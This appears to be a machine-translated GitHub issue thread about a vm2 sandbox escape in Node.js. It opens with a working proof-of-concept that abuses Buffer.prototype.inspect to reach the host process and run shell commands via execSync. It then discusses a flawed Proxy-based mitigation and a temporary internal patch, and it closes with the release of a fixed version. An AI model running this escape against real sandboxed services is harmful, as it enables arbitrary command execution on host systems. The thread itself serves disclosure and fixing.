El siguiente código se puede utilizar para escapar de la máquina virtual y, por ejemplo, ejecutar el comando en el shell.
Ya se informó en el n. ° 187 aquí , todavía funciona en el nodo 13.6.0 y vm2 v3.8.4
const {VM} = require('vm2');
const vm = new VM({
wasm: false,
timeout: 2000,
sandbox: {},
eval: false,
});
const malicious = '(' + function(){
try { require('child_process').execSync("idea") } catch(e){} // Not getting executed
let buffer = {
hexSlice: () => "",
magic: {
get [Symbol.for("nodejs.util.inspect.custom")](){
throw f => f.constructor("return process")();
}
}
};
try{
Buffer.prototype.inspect.call(buffer, 0, { customInspect: true });
}catch(e){
e(()=>0).mainModule.require('child_process').execSync("winver") // Actually opens winver
}
}+')()';
vm.run(malicious)
@patriksimek Este problema se solucionó en el maestro, sin embargo, la solución vino con https://github.com/patriksimek/vm2/pull/242, que es posterior a la versión 3.8.4. Entonces mpn no tiene esta solución.
Esto permanece abierto hasta que salga la v3.8.5.
¿Tenemos una ETA?
@ jan-osch Dado que @patriksimek parece estar bastante inactivo, no lo sé.
@XmiliaH ¡ gracias por tu respuesta y todas las contribuciones!
¿Crees que tal solución con parche de mono evitará la ruptura hasta que tengamos una versión actualizada publicada?
const vm = new NodeVM({
console: 'off',
sandbox: {
console: consoleInterface,
setTimeout,
print,
// TODO remove once vm2 fixed the breakout issue
// Reference: https://github.com/patriksimek/vm2/issues/268
Buffer: {
...Buffer,
prototype: new Proxy(Buffer.prototype, {
get(object, property) {
if (property === 'inspect') {
return () => {
console.log('[BREAKOUT_ATTEMPT]'); // eslint-disable-line no-console
consoleInterface.error('Nice try! This breakout attempt will be reported');
};
}
return object[property];
},
}),
},
},
require: { // here define modules that can be required
builtin: [
// some list
],
external: [
//...
],
},
});
return vm.run(code, SCRIPT_PATH);
@ jan-osch Eso no es una buena idea:
1) Olvida la clave [Symbol.for ("nodejs.util.inspect.custom")].
2) Permite escribir en el prototipo del búfer del host.
3) El problema es que console.log también desencadenará este problema y tu solución no hace nada contra eso.
Desafortunadamente, no existe una solución fácil.
Aquí hay una solución de hacky temporal mal probada:
function hacky_fix(vm) {
const internal = vm._internal;
const old = internal.Decontextify.object;
const handler = {__proto__: null};
internal.Decontextify.object = (object, traps, deepTraps, flags, mock) => {
const value = old(object, traps, deepTraps, flags, mock);
const better = new Proxy(value, handler);
internal.Decontextify.proxies.set(object, better);
internal.Contextify.proxies.set(better, object);
return better;
};
}
Parcha funciones internas, así que utilícelo con cuidado.
¡Gracias @XmiliaH! ¿Conoce algún proyecto con un conjunto de pruebas para estos casos de ruptura? Me gustaría agregar algunas pruebas de ruptura a mi IC como un sistema de alerta temprana
Tenemos algunos casos de prueba en test / vm.js. Simplemente busque ataque y encontrará los casos.
Recordatorio amistoso @patriksimek sería
@mxschmitt Recién lanzado como 3.9.0. Lo siento por el retraso.
Comentario más útil
@mxschmitt Recién lanzado como 3.9.0. Lo siento por el retraso.